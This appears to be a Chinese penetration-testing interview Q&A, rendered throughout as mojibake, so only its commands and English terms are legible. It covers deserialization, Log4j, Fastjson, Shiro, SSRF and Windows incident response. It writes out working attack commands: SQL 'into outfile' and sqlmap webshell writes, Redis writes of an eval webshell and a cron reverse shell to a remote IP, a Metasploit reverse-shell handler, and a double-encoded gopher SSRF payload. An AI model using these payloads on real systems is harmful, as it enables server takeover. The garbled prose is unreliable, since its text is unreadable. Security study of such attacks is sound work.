?id=1 into outfile 'C:/wamp64/www/work/shell.php' fields terminated by '<?php phpinfo() ?>';//ʹÓà fields terminated by Óï¾äÆ´½ÓwebshellµÄÄÚÈÝ¡£¡£¡£¡£¡£fields terminated by ¿ÉÒÔÃ÷ȷΪ ÒÔÿ¸ö×ֶεÄλÖÃÌí¼Ó xx ÄÚÈÝ¡£¡£¡£¡£¡£
columns terminated by дÈë
?id=1 into outfile 'C:/wamp64/www/shell.php' COLUMNS terminated by '<?php phpinfo() ?>';//ʹÓà fields terminated by Óï¾äÆ´½ÓwebshellµÄÄÚÈÝ¡£¡£¡£¡£¡£fields terminated by ¿ÉÒÔÃ÷ȷΪ ÒÔÿ¸ö×ֶεÄλÖÃÌí¼Ó xx ÄÚÈÝ¡£¡£¡£¡£¡£
sqlmapдÈë
д£º(ҪдµÄÎļþ£¬£¬±ØÐèÔÚkali±¾»úÀïÓÐ)дÈëµ½ /tmp Ŀ¼Ï sqlmap -u "http://127.0.0.1/index.php?page=user-info.php&username=a%27f%27v&password=afv&user-info-php-submit-button=View+Account+Details" -p 'username' --file-write="shell.php" --file-dest="/tmp/shell.php"
Ê®Îå. Ïàʶ¹ý·´ÐòÁл¯Îó²îÂ𣿣¿£¿
´ð£º
ÔÀí£º
ÐòÁл¯ÊÇÖ¸³ÌÐò½«¹¤¾ßת»¯Îª×Ö½ÚÐòÁдӶø±ãÓÚ´æ´¢ÔËÊäµÄÒ»ÖÖ·½·¨£¬£¬·´ÐòÁл¯ÔòÓëÆäÏà·´£¬£¬¼´½«×Ö½ÚÐòÁÐת»¯Îª¹¤¾ß¹©³ÌÐòʹÓᣡ£¡£¡£¡£³ÌÐòÔÚ¾ÙÐз´ÐòÁл¯Ê±»áŲÓÃһЩº¯Êý£¬£¬ºÃ±È³£¼ûµÄPHP·´ÐòÁл¯º¯Êýunserialize()ÒÔ¼°Ò»Ð©³£¼ûµÄħÊõÒªÁ죬£¬ºÃ±È½á¹¹º¯Êý_construct()£¬£¬Îö¹¹º¯Êý_destruct()£¬£¬_wakeup()£¬£¬_toString()£¬£¬_sleep()µÈµÈ¡£¡£¡£¡£¡£ÈôÊÇÕâЩº¯ÊýÔÚת´ï²ÎÊýʱûÓоÙÐÐÑÏ¿áµÄ¹ýÂ˲½·¥£¬£¬ÄÇô¹¥»÷Õ߾ͿÉÒԽṹ¶ñÒâ´úÂë²¢½«ÆäÐòÁл¯ºó´«È뺯ÊýÖУ¬£¬´Ó¶øµ¼Ö·´ÐòÁл¯Îó²î¡£¡£¡£¡£¡£
Java·´ÐòÁл¯
Java·´ÐòÁл¯¾ÍÊǽ«java¹¤¾ßת»¯Îª×Ö½ÚÐòÁеÄÀú³Ì¡£¡£¡£¡£¡£·´ÐòÁл¯µÄÀú³Ì¾ÍÊÇ
1£¬£¬½¨ÉèÒ»¸ö¹¤¾ßÊä³öÁ÷
2£¬£¬Í¨¹ý¹¤¾ßÊä³öÁ÷µÄReadObject()ÒªÁìÀ´¶ÁÈ¡¹¤¾ß
Ê®Áù. ³£¼ûµÄ¿ò¼ÜÎó²î£¿£¿£¿
´ð£º
log4jÔ¶³Ì´úÂëÖ´ÐÐÎó²î
ÔÀí£º
Log4j ÊÇApache µÄÒ»¸ö¿ªÔ´ÏîÄ¿£¬£¬ÊÇÒ»¿î»ùÓÚJava µÄ¿ªÔ´ÈÕÖ¾¼Í¼¹¤¾ß¡£¡£¡£¡£¡£¸ÃÎó²îÖ÷ÒªÊÇÓÉÓÚÈÕÖ¾ÔÚ´òӡʱµ±Óöµ½`${`ºó£¬£¬ÒÔ:ºÅ×÷Ϊ֧½â£¬£¬½«±í´ïʽÄÚÈÝÖ§½â³ÉÁ½²¿·Ö£¬£¬Ç°ÃæÒ»²¿·Öprefix£¬£¬ºóÃæ²¿·Ö×÷Ϊkey£¬£¬È»ºóͨ¹ýprefixÈ¥ÕÒ¶ÔÓ¦µÄlookup£¬£¬Í¨¹ý¶ÔÓ¦µÄlookupʵÀýŲÓÃlookupÒªÁ죬£¬×îºó½«key×÷Ϊ²ÎÊý´øÈëÖ´ÐУ¬£¬Òý·¢Ô¶³Ì´úÂëÖ´ÐÐÎó²î¡£¡£¡£¡£¡£
Ïêϸ²Ù×÷£º
ÔÚÕý³£µÄlog´¦Öóͷ£Àú³ÌÖжÔ**${**ÕâÁ½¸ö½ôÁÚµÄ×Ö·û×öÁ˼ì²â£¬£¬Ò»µ©Æ¥Åäµ½ÀàËÆÓÚ±í´ïʽ½á¹¹µÄ×Ö·û´®¾Í»á´¥·¢Ìæ»»»úÖÆ£¬£¬½«±í´ïʽµÄÄÚÈÝÌæ»»Îª±í´ïʽÆÊÎöºóµÄÄÚÈÝ£¬£¬¶ø²»ÊDZí´ïʽ×Ô¼º£¬£¬´Ó¶øµ¼Ö¹¥»÷Õ߽ṹÇкÏÒªÇóµÄ±í´ïʽ¹©ÏµÍ³Ö´ÐÐ
Fastjson·´ÐòÁл¯Îó²î
Åжϣº
Õý³£ÇëÇóÊÇgetÇëÇó²¢ÇÒûÓÐÇëÇóÌ壬£¬¿ÉÒÔͨ¹ý½á¹¹¹ýʧµÄPOSTÇëÇ󣬣¬¼´¿ÉÉó²éÔÚ·µ»Ø°üÖÐÊÇ·ñÓÐfastjsonÕâ¸ö×Ö·û´®À´Åжϡ£¡£¡£¡£¡£
ÔÀí£º
fastjsonÊǰ¢Àï°Í°Í¿ª·¢µÄÒ»¿î½«json×Ö·û´®ºÍjava¹¤¾ß¾ÙÐÐÐòÁл¯ºÍ·´ÐòÁл¯µÄ¿ªÔ´jsonÆÊÎö¿â¡£¡£¡£¡£¡£fastjsonÌṩÁËautotype¹¦Ð§£¬£¬ÔÚÇëÇóÀú³ÌÖУ¬£¬ÎÒÃÇ¿ÉÒÔÔÚÇëÇó°üÖÐͨ¹ýÐÞ¸Ä@typeµÄÖµ£¬£¬À´·´ÐòÁл¯ÎªÖ¸¶¨µÄÀàÐÍ£¬£¬¶øfastjsonÔÚ·´ÐòÁл¯Àú³ÌÖлáÉèÖúͻñÈ¡ÀàÖеÄÊôÐÔ£¬£¬ÈôÊÇÀàÖб£´æ¶ñÒâÒªÁ죬£¬¾Í»áµ¼Ö´úÂëÖ´ÐеÈÕâÀàÎÊÌâ¡£¡£¡£¡£¡£
ÎÞ»ØÏÔÔõô°ì£º
1.Ò»ÖÖÊÇÖ±½Ó½«ÏÂÁîÖ´ÐÐЧ¹ûдÈëµ½¾²Ì¬×ÊÔ´ÎļþÀ£¬Èçhtml¡¢jsµÈ£¬£¬È»ºóͨ¹ýhttp»á¼û¾Í¿ÉÒÔÖ±½Ó¿´µ½Ð§¹û
2.ͨ¹ýdnslog¾ÙÐÐÊý¾ÝÍâ´ø£¬£¬µ«ÈôÊÇÎÞ·¨Ö´ÐÐdnsÇëÇó¾ÍÎÞ·¨ÑéÖ¤ÁË
3.Ö±½Ó½«ÏÂÁîÖ´ÐÐЧ¹û»ØÏÔµ½ÇëÇóPocµÄHTTPÏìÓ¦ÖÐ
Shiro·´ÐòÁл¯Îó²î
ÔÀí£º
ShiroÊÇApacheϵÄÒ»¸ö¿ªÔ´JavaÇå¾²¿ò¼Ü£¬£¬Ö´ÐÐÉí·ÝÈÏÖ¤£¬£¬ÊÚȨ£¬£¬ÃÜÂëºÍ»á»°ÖÎÀí¡£¡£¡£¡£¡£shiroÔÚÓû§µÇ¼ʱ³ýÁËÕ˺ÅÃÜÂëÍ⻹ÌṩÁË¿Éת´ïÑ¡Ïîremember me¡£¡£¡£¡£¡£Óû§ÔڵǼʱÈôÊǹ´Ñ¡ÁËremember meÑ¡Ï£¬ÄÇôÔÚÏÂÒ»´ÎµÇ¼ʱä¯ÀÀÆ÷»áЯ´øcookieÖеÄremember me×Ö¶ÎÌᳫÇëÇ󣬣¬¾Í²»ÐèÒªÖØÐÂÊäÈëÓû§ÃûºÍÃÜÂë¡£¡£¡£¡£¡£
Åжϣº
1.Êý¾Ý·µ»Ø°üÖаüÀ¨rememberMe=deleteMe×ֶΡ£¡£¡£¡£¡£
2.Ö±½Ó·¢ËÍÔÊý¾Ý°ü£¬£¬·µ»ØµÄÊý¾ÝÖв»±£´æÒªº¦×Ö¿ÉÒÔͨ¹ýÔÚ·¢ËÍÊý¾Ý°üµÄcookieÖÐÔöÌí×ֶΣº****rememberMe=È»ºóÉó²é·µ»ØÊý¾Ý°üÖÐÊÇ·ñ±£´æÒªº¦×Ö¡£¡£¡£¡£¡£
shiro-550£º
shiro·´ÐòÁл¯Îó²îʹÓÃÓÐÁ½¸öÒªº¦µã£¬£¬Ê×ÏÈÊÇÔÚshiro<1.2.4ʱ£¬£¬AES¼ÓÃܵÄÃÜÔ¿Key±»Ó²±àÂëÔÚ´úÂëÀ£¬Ö»ÒªÄÜ»ñÈ¡µ½Õâ¸ökey¾Í¿ÉÒԽṹ¶ñÒâÊý¾ÝÈÃshiroʶ±ðΪÕý³£Êý¾Ý¡£¡£¡£¡£¡£ÁíÍâ¾ÍÊÇshiroÔÚÑéÖ¤rememberMeʱʹÓÃÁËreadObjectÒªÁ죬£¬readObjectÓÃÀ´Ö´Ðз´ÐòÁл¯ºóÐèÒªÖ´ÐеĴúÂëÆ¬¶Ï£¬£¬´Ó¶øÔì³É¶ñÒâÏÂÁî¿ÉÒÔ±»Ö´ÐС£¡£¡£¡£¡£¹¥»÷Õ߽ṹ¶ñÒâ´úÂ룬£¬²¢ÇÒÐòÁл¯£¬£¬AES¼ÓÃÜ£¬£¬base64±àÂëºó£¬£¬×÷ΪcookieµÄrememberMe×ֶη¢ËÍ¡£¡£¡£¡£¡£Shiro½«rememberMe¾ÙÐбàÂ룬£¬½âÃܲ¢ÇÒ·´ÐòÁл¯£¬£¬×îÖÕÔì³É·´ÐòÁл¯Îó²î¡£¡£¡£¡£¡£
shiro-721£º
²»ÐèÒªkey£¬£¬Ê¹ÓÃPadding Oracle Attack½á¹¹³öRememberMe×ֶκó¶ÎµÄÖµÁ¬ÏµÕýµ±µÄRemember¡£¡£¡£¡£¡£
Ê®Æß.Ïàʶ¹ýredisÊý¾Ý¿âºÍ³£¼ûµÄÎó²îÂ𣿣¿£¿
´ð£º
redisÊÇÒ»¸ö·Ç¹ØÏµÐÍÊý¾Ý¿â£¬£¬Ê¹ÓõÄĬÈ϶˿ÚÊÇ6379¡£¡£¡£¡£¡£³£¼ûµÄÎó²îÊÇδÊÚȨ»á¼ûÎó²î£¬£¬¹¥»÷ÕßÎÞÐèÈÏÖ¤¾Í¿ÉÒÔ»á¼ûÄÚ²¿Êý¾Ý¡£¡£¡£¡£¡£Ê¹ÓÃÊÖ¶ÎÖ÷ÒªÓУº
1.ÏòrootȨÏÞÕË»§Ð´Èëssh¹«Ô¿Îļþ£¬£¬Ö±½ÓÃâÃܵǼЧÀÍÆ÷¡£¡£¡£¡£¡£(Êܺ¦Õßredis·ÇrootȨÏÞÔËÐлᱨ´í)
Ìõ¼þ£º
ЧÀÍÆ÷±£´æ.sshĿ¼ÇÒ¾ßÓÐдÈëµÄȨÏÞ
ÔÀí£º
ÔÚÊý¾Ý¿âÖвåÈëÒ»ÌõÊý¾Ý£¬£¬½«±¾»úµÄ¹«Ô¿×÷Ϊvalue£¬£¬keyÖµËæÒ⣬£¬È»ºóͨ¹ýÐÞ¸ÄÊý¾Ý¿âµÄĬÈÏ·¾¶Îª/root/.sshºÍĬÈϵĻº³åÎļþauthorized.keys£¬£¬°Ñ»º³åµÄÊý¾ÝÉúÑÄÔÚÎļþÀ£¬ÕâÑù¾Í¿ÉÒÔÔÚЧÀÍÆ÷¶ËµÄ/root/.sshÏÂÌìÉúÒ»¸öÊÚȨµÄkey¡£¡£¡£¡£¡£
2.дÈëwebshell
Ìõ¼þ£º
ÒÑÖªweb¾ø¶Ô·¾¶¡£¡£¡£¡£¡£
°ì·¨£º
1. redis -cli -h 192.168.x.x ÅþÁ¬Ä¿µÄЧÀÍÆ÷
2. config set dir "/var/www/html" ÉèÖÃÉúÑÄÎļþ·¾¶
3. config set dbfilename shell.php ÉèÖÃÉúÑÄÎļþÃû
4. set x "\n\n<?php @eval($_POST['cmd']); ?>\n" ½«webshellдÈëx¼üÖµÖÐ
5. save ÉúÑÄ
¾ÖÏÞ£º
1.ЧÀÍÆ÷´¦ÓÚÄÚÍø£¬£¬Ð´ÈëwebshellºóׯÏÐÓÎÏ·¹«ÍøIPÎÞ·¨ÅþÁ¬
2.ЧÀÍÆ÷IPµØµã²»Àο¿
3.6379¶Ë¿Ú²»ÔÊÐíÈëÆ«Ïò
4.ÉÏ´«webshell¿ÉÄÜÖ±½Ó±»É±¶¾Èí¼þɾ³ý
3.·´µ¯ÅþÁ¬shell
ÉèÖüàÌý¶Ë¿Ú£¬£¬³£ÓõŤ¾ß1.msf 2.netcat 3.socatʹÓÃmsfÉèÖüàÌý°ì·¨£º1. use exploit/multi/handler2. set payload generic/shell_reverse_tcp3. set lhost 192.168.x.x ĬÈϼàÌý¶Ë¿ÚΪ44444. run
4.׼ʱʹÃü·´µ¯shell
°ì·¨£º×¼Ê±Ê¹ÃüÓõıí´ïʽ £ºCron±í´ïʽÊÇÒ»¸ö×Ö·û´®£¬£¬¸Ã×Ö·û´®ÓÉ6¸ö¿Õ¸ñ·ÖΪ7¸öÓò£¬£¬Ã¿Ò»¸öÓò´ú±íÒ»¸öʱ¼ä¼ÄÒå¡£¡£¡£¡£¡£·Ö ʱ Ìì Ô ÖÜ user-name(Óû§) command(ÏÂÁî) ºÃ±Èÿ¹ýÒ»·ÖÖÓÏòrootÓû§µÄ׼ʱʹÃüÖÐдÈë·´µ¯ÅþÁ¬ÏÂÁî(1) config set dir /var/spool/cron/ //Ŀ¼Çл»µ½×¼Ê±Ê¹ÃüµÄÎļþ¼ÐÖÐ(2) config set dbfilename root //ÉèÖÃÉúÑÄÎļþÃû(3)set x "\n * * * * * bash -i >& /dev/tcp/192.168.96.222/7777 0>&1\n" //½«·´µ¯shellдÈëx¼üÖµÖÐ(4)save //ÉúÑÄ
ʹÓÃ׼ʱʹÃü·´µ¯shellÔÚÄ¿µÄϵͳÊÇCentosÉÏ¿ÉÓ㬣¬UbuntuÉÏÓÐÏÞÖÆ
ÀíÓÉÈçÏ£º
1.ĬÈÏredisдÎļþºóÊÇ644µÄȨÏÞ£¬£¬µ«ubuntuÒªÇóÖ´ÐÐ׼ʱʹÃü¼þ/var/spool/cron/crontabs/ȨÏÞ±ØÐèÊÇ600Ò²¾ÍÊÇ-rw-------²Å»áÖ´ÐУ¬£¬²»È»»á±¨´í£¬£¬¶øCentosµÄ׼ʱʹÃüÎļþȨÏÞ644Ò²ÄÜÖ´ÐÐ2.redisÉúÑÄRDB»á±£´æÂÒÂ룬£¬ÔÚUbuntuÉϻᱨ´í£¬£¬¶øÔÚCentosÉϲ»»á±¨´í3.Á½¸öϵͳµÄ׼ʱʹÃüÎļþĿ¼²î±ð
ʹÓÃÖ÷´Ó¸´ÖÆgetshell
Ìõ¼þ£º°æ±¾(4.x~5.0.5)ÔÀí£ºÊý¾Ý¶ÁдÌåÁ¿ºÜ´óʱ£¬£¬ÎªÁ˼õÇáЧÀÍÆ÷µÄѹÁ¦£¬£¬redisÌṩÁËÖ÷´Óģʽ£¬£¬Ö÷´Óģʽ¾ÍÊÇÖ¸¶¨Ò»¸öredisʵÀý×÷ΪÖ÷»ú£¬£¬ÆäÓàµÄ×÷Ϊ´Ó»ú£¬£¬ÆäÖÐÖ÷»úºÍ´Ó»úµÄÊý¾ÝÊÇÏàͬµÄ£¬£¬¶ø´Ó»úÖ»ÈÏÕæ¶Á£¬£¬Ö÷»úÖ»ÈÏÕæÐ´¡£¡£¡£¡£¡£Í¨¹ý¶ÁдÊèÉ¢¿ÉÒÔ¼õÇáЧÀÍÆ÷¶ËµÄѹÁ¦¡£¡£¡£¡£¡£Ê¹Óù¤¾ß£ºRedisRogueServerµØµã£ºhttps://github.com/n0b0dyCN/redis-rogue-serverʹÓù¤¾ßµÄÏÂÁpython3 redis-rogue-server.py --rhost=x.x.x.x --lhost=x.x.x.x --exp=exp.soÁ½ÖÖʹÓÃÒªÁ죺½»»¥Ê½·´µ¯Ê½ÏÞÖÆ£ºÊ¹ÓÃÕâ¸öÒªÁìgetshell»òÕßrceí§Òâµ¼ÖÂredisЧÀÍ̱»¾£¬£¬Ò»Ñùƽ³£²»½¨ÒéʹÓÃ
redisδÊÚȨ»á¼ûÎó²îµÄÌá·À²½·¥£º
1.Ìí¼ÓµÇ¼ÃÜÂë
2.ÐÞ¸ÄĬÈ϶˿Ú
3.¹Ø±Õ¶Ë¿Ú
4.եȡÒÔrootÓû§È¨ÏÞÆô¶¯£¬£¬ÒÔµÍȨÏÞÆô¶¯redisЧÀÍ
Ê®°Ë. SSRFÔõôÁ¬ÏµRedisÏà¹ØÎó²îʹÓã¿£¿£¿
´ð£º
Ö÷Ҫͨ¹ýÁ½ÖÖÐÒ飬£¬dictÐæÅºÍgopherÐÒé¡£¡£¡£¡£¡£
dictÐÒéʹÓÃredisÏà¹ØÎó²î£º
̽²â¶Ë¿Ú£º
ssrf.php?url=dict://x.x.x.x:$¶Ë¿Ú$ ʹÓÃburpsuite±¬ÆÆ¶Ë¿Ú
̽²âÊÇ·ñÉèÖÃÈõ¿ÚÁ
ssrf.php?url=dict://x.x.x.x:6379/info ÒÑÖª¶Ë¿ÚʹÓÃinfo̽²âÊÇ·ñÉèÖÃÁËÃÜÂë
±¬ÆÆÃÜÂ룺
ssrf.php?url=dict://x.x.x.x:6379/auth:$ÃÜÂë$ ʹÓÃburpsuite±¬ÆÆÃÜÂë
дÈëwebshell£º
1. url=dict://xxx.xxx:6379/config:set:dir:/var/www/html Çл»ÎļþĿ¼2. url=dict://xxx.xxx:6379/config:set:dbfilename:webshell.php ÉèÖÃÉúÑÄÎļþÃû3. url=dict://xxx.xxx:6379/set:webshell:"\x3c\x3f\x70\x68\x70\x20\x70\x68\x70\x69\x6e\x66\x6f\x28\x29\x3b\x3f\x3e" //ʹÓÃdictÐÒéдÈëwebshell ÒÔÉϵÄ×Ö·û±àÂëÊÇ<?php phpinfo();?>µÄÊ®Áù½øÖÆ4. url=dict://x.x.x.x:6379/save ÉúÑÄ
1. url=dict://xxx.xxx:6379/config:set:dir:/var/www/html Çл»ÎļþĿ¼
2. url=dict://xxx.xxx:6379/config:set:dbfilename:webshell.php ÉèÖÃÉúÑÄÎļþÃû
3. url=dict://xxx.xxx:6379/set:webshell:"\x3c\x3f\x70\x68\x70\x20\x70\x68\x70\x69\x6e\x66\x6f\x28\x29\x3b\x3f\x3e"
//ʹÓÃdictÐÒéдÈëwebshell ÒÔÉϵÄ×Ö·û±àÂëÊÇ<?php phpinfo();?>µÄÊ®Áù½øÖÆ
4.ssrf.php?url=dict://x.x.x.x:6379/save ÉúÑÄ
dictÐÒéʹÓÃÍýÏëʹÃü·´µ¯shell»òÕßдÈëssh¹«Ô¿µÄÊÖ¶ÎÀàËÆ
gopherÐÒéʹÓÃredisδÊÚȨ»á¼ûÎó²îдÈëwebshell£º
ͨÀýʹÓð취£º
set x "\n\n\n<?php @eval($_POST['redis']);?>\n\n\n"
config set dir /var/www/html
config set dbfilename shell.php
save
Á½´Îurl±àÂëºó½á¹¹url£º
http://192.168.1.1/ssrf.php?url=gopher%3a%2f%2f127.0.0.1%3a6379%2f_%25%37%33%25%36%35%25%37%34%25%32%30%25%37%38%25%32%30%25%32%32%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%33%63%25%33%66%25%37%30%25%36%38%25%37%30%25%32%30%25%34%30%25%36%35%25%37%36%25%36%31%25%36%63%25%32%38%25%32%34%25%35%66%25%35%30%25%34%66%25%35%33%25%35%34%25%35%62%25%32%37%25%37%32%25%36%35%25%36%34%25%36%39%25%37%33%25%32%37%25%35%64%25%32%39%25%33%62%25%33%66%25%33%65%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%32%32%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%39%25%37%32%25%32%30%25%32%66%25%37%36%25%36%31%25%37%32%25%32%66%25%37%37%25%37%37%25%37%37%25%32%66%25%36%38%25%37%34%25%36%64%25%36%63%25%32%30%25%32%30%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%37%33%25%36%38%25%36%35%25%36%63%25%36%63%25%32%65%25%37%30%25%36%38%25%37%30%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35

//µÚÒ»´Îurl½âÂëºÍµÚ¶þ´Îurl½âÂë
//ͬÀíÆäËûÀàËÆÍýÏëʹÃü·´µ¯ºÍдÈëssh¹«Ô¿µÈgetshell·½·¨ÏàËÆ
Ê®¾Å. windowsÓ¦¼±ÏìӦʱÅŲéÆÊÎöµÄÏà¹ØÏ¸½Ú£¿£¿£¿
´ð£º
¿ÉÒÉÕ˺ÅÅŲé lusrmgr.msc
1.¼ì²éЧÀÍÆ÷ÊÇ·ñÓÐÈõ¿ÚÁî¡£¡£¡£¡£¡£ºÃ±È¿Õ¿ÚÁî»òÕßÃÜÂëÖØÆ¯ºó²»·ó¡£¡£¡£¡£¡£
2.¸ßΣ¶Ë¿ÚÊÇ·ñ¶ÔÍ⿪·Å£¬£¬ºÃ±ÈSSHЧÀÍ22¶Ë¿Ú£¬£¬RDPЧÀÍ3389¶Ë¿ÚµÈ¡£¡£¡£¡£¡£
3.Éó²éЧÀÍÆ÷ÊÇ·ñÓпÉÒÉÕ˺𣡣¡£¡£¡£
ÊÖ¹¤·½Ã棺lusrmgr.mscÏÂÁîÉó²éÓû§ºÍ×飬£¬Éó²éÊÇ·ñÓÐÐÂÔöÕ˺ţ¬£¬Òþ²ØÕ˺ţ¬£¬¿Ë¡Õ˺𣡣¡£¡£¡£
¹¤¾ß·½Ã棺ºÃ±ÈʹÓÃD¶ÜµÈ¹¤¾ßÀ´¼ì²âÒþ²ØÕ˺𣡣¡£¡£¡£
4.Á¬ÏµÈÕÖ¾ÆÊÎö eventvwr.msc Éó²éÖÎÀíÔ±µÇ¼ʱ¼ä£¬£¬Ïà¹ØÊÂÎñÊÇ·ñÓÐÒì³£¡£¡£¡£¡£¡£
Ãô¸ÐÊÂÎñID£º
4624 µÇ¼ÀÖ³É
4625 µÇ¼ʧ°Ü
4672 ʹÓó¬µÈÖÎÀíÔ±¾ÙÐеǼ
4720 ½¨ÉèÓû§
5.ʹÓÃquery userÉó²éÄ¿½ñϵͳµÄ»á»°£¬£¬ºÃ±ÈÉó²éÊÇ·ñÓÐÈËʹÓÃÔ¶³ÌµÇ¼ЧÀÍÆ÷¡£¡£¡£¡£¡£
¿ÉÒÉÀú³ÌºÍЧÀÍÅŲé taskmgr services.msc
1.Éó²éCPU£¬£¬Äڴ棬£¬ÍøÂçµÈ×ÊÔ´ÊÇ·ñÓпÉÒÉ״̬¡£¡£¡£¡£¡£ºÃ±ÈCPUÕ¼ÓÃÂʹý¸ß¿ÉÄÜÊÇÖÐÁËÍڿ󲡶¾£¬£¬´ÅÅ̿ռä´ó×ÚÕ¼ÓÿÉÄÜÊǾ籾»ò²¡¶¾´ó×ÚÌìÉúºÍ¸´ÖÆÒþ²ØÎļþ¡£¡£¡£¡£¡£
2.¼ì²éÀú³ÌÃû
ijЩÀú³ÌÃûÊÇ´ó×ÚËæ»úµÄÇéÐΣ¬£¬ºÃ±ÈhrlC3.tmp¡¢hrlD5.tmp¡¢hrl6.tmp¡¢hrlEE.tmpµÈ¶à¸öÃû×ÖÏàËÆµÄÀú³Ì£¬£¬»ù±¾ÉÏ¿ÉÒԶ϶¨ÊÇÒì³£Àú³Ì¡£¡£¡£¡£¡£
Òì³£Àú³ÌÃûαװ³ÉϵͳÀú³Ì»òÕß˵³£¼ûЧÀ͵ÄÀú³ÌÃû£¬£¬´Ëʱ¿ÉÒÔͨ¹ýÀú³ÌÐÎòÀ´Åжϣ¬£¬²¢ÇÒÐèÒªÊÖ¹¤±ÈÕÕ¡£¡£¡£¡£¡£
3.¼ì²éÀú³ÌºÍЧÀÍÐÎò£¬£¬ÐÞ¸Äʱ¼ä»òÕßÊý×ÖÊðÃûÊÇ·ñÓÐÒì³£¡£¡£¡£¡£¡£
4.ʹÓù¤¾ß¾ÙÐмì²â£¬£¬ºÃ±ÈProcess Hunter»òÕß»ðÈÞ½£µÈרÃÅÕë¶ÔÀú³ÌЧÀÍÐÅÏ¢µÄÅŲéÆÊÎö¹¤¾ß£¬£¬Ö÷ÒªÉó²éµÄÊǹ«Ë¾Ãû£¬£¬ÐÎò£¬£¬Ç徲״̬ºÍÆô¶¯ÀàÐ͵ȷ½ÃæÀ´ÅŲ顣¡£¡£¡£¡£
¿ÉÒÉÆô¶¯ÏîÅŲé msconfig
1. msconfig»òÕßʹÃüÖÎÀíÆ÷ÖÐµÄÆô¶¯ÏîÉó²éÃû³Æ£¬£¬Ðû²¼ÕßºÍÆô¶¯Ó°Ï죬£¬ÒÔ¼°ÓÒ¼üÉó²éÊôÐÔÀ´¿´Êý×ÖÊðÃûºÍÐÞ¸Äʱ¼ä¡£¡£¡£¡£¡£
2. Á¬Ïµ¹¤¾ß¾ÙÐÐÅŲ飬£¬ºÃ±È»ðÈÞ½£µÈ¹¤¾ß£¬£¬»á½«Æô¶¯Ïî·ÖÀàΪµÇ¼£¬£¬Çý¶¯³ÌÐò£¬£¬ÍýÏëʹÃü£¬£¬Ó³ÏñÐ®ÖÆµÈ£¬£¬Ê¹ÓÃÆÊÎöÅŲé
¿ÉÒÉÎļþÅŲé
1.¸÷¸ö´ÅÅ̵ÄTemp/tmpĿ¼ÖÐÊÇWindows±¬·¢µÄÔÝʱÎļþ£¬£¬Éó²éÓÐÎÞÒì³£Îļþ¡£¡£¡£¡£¡£
2.RecentĿ¼»á¼Í¼×î½ü·¿ªµÄÎĵµÒÔ¼°³ÌÐòµÄÏà¹Ø¼Í¼¡£¡£¡£¡£¡£
3.Éó²éÎļþµÄ½¨Éèʱ¼ä£¬£¬ÐÞ¸Äʱ¼äºÍ»á¼ûʱ¼ä£¬£¬ºÃ±È˵¹¥»÷ÕßʹÓò˵¶µÈ¹¤¾ß¶ÔÎļþ¾ÙÐÐÐ޸Ļá¸Ä±äÐÞ¸Äʱ¼ä£¬£¬ÈôÊÇÐÞ¸Äʱ¼äÔÚ½¨Éèʱ¼ä֮ǰ£¬£¬ÄǾÍÊǺÜÏÔ×ŵĿÉÒÉÎļþ¡£¡£¡£¡£¡£
4.windowsϵͳÎҵĵçÄÔ¿ìËÙ»á¼û£¬£¬¿ÉÒÔ¿´µ½×î½üʹÓõÄÎļþ£¬£¬ºÃ±È˵ͼƬ»òÕßѹËõ°üµÈÎļþµÄʹÓÃÀúÊ·ºÍÎļþ·¾¶¶¼»áÏÔʾ¡£¡£¡£¡£¡£
¶ñÒâÑù±¾ÅŲé
1.¶ñÒâÑù±¾Ö¸µÄÒ»Ñùƽ³£ÊÇwebshell£¬£¬²¡¶¾£¬£¬Ä¾Âí»òÕߺóÃųÌÐò»òÎļþ£¬£¬¿ÉÒÔÆ¾Ö¤×°±¸µÄ¸æ¾¯ÐÅÏ¢À´²éÕÒÏà¹ØÂ·¾¶£¬£¬ÔÙÅŲéÏà¹ØµÄÀú³ÌºÍÆô¶¯Ïî¡£¡£¡£¡£¡£
2.²»Öªõè¾¶¾¶µÄ»°¿ÉÒÔʹÓÃÏà¹ØµÄÇå¾²×°±¸À´¾ÙÐмì²â£¬£¬ºÃ±È˵ͨ¹ýD¶Ü£¬£¬ºÓÂí²éɱµÈ¹¤¾ß¶Ôwebshell¿ÉÄܱ£´æµÄĿ¼¾ÙÐÐÒ»¸öÅŲé²éɱ£¬£¬Ê¹ÓÃͨÀýµÄ·À»ðǽÈí¼þÀ´¶ÔͨÅÌ»òÕß¿ÉÒÉĿ¼ɨÃ財¶¾¡£¡£¡£¡£¡£
¶þÊ®. ³£¼ûµÄwebshellÅþÁ¬¹¤¾ßÁ÷Á¿£¿£¿£¿
´ð£º
Öйú²Ëµ¶
ÅþÁ¬Àú³ÌÖÐʹÓÃbase64±àÂë¶Ô·¢Ë͵ÄÖ¸Áî¾ÙÐмÓÃÜ£¬£¬ÆäÖÐÁ½¸öÒªº¦payload z1 ºÍ z2£¬£¬Ãû×Ö¶¼ÊǿɱäµÄ¡£¡£¡£¡£¡£
È»ºóÉÐÓÐÒ»¶ÎÒÔQG¿ªÍ·£¬£¬7J×îºóµÄÀο¿´úÂë¡£¡£¡£¡£¡£
ÒϽ£
ĬÈϵÄuser-agentÇëÇóÍ·ÊÇantsword xxx£¬£¬²»¹ý¿ÉÒÔÐ޸ġ£¡£¡£¡£¡£
Ò»Ñùƽ³£½«payload¾ÙÐзֶΣ¬£¬È»ºó»®·Ö¾ÙÐÐbase64±àÂ룬£¬Ò»Ñùƽ³£¾ßÓÐÏñevalÕâÑùµÄÒªº¦×Ö£¬£¬È»ºóÄØ»òÐíÂÊÉÐÓÐ@ini_set("display","0");Õâ¶Î´úÂë¡£¡£¡£¡£¡£
±ùЫ
php´úÂëÖпÉÄܱ£´æeval£¬£¬assertµÈÒªº¦´Ê£¬£¬jsp´úÂëÖпÉÄÜ»áÓÐgetclass()£¬£¬getclassLoader()µÈ×Ö·ûÌØÕ÷¡£¡£¡£¡£¡£
±ùЫ2.0
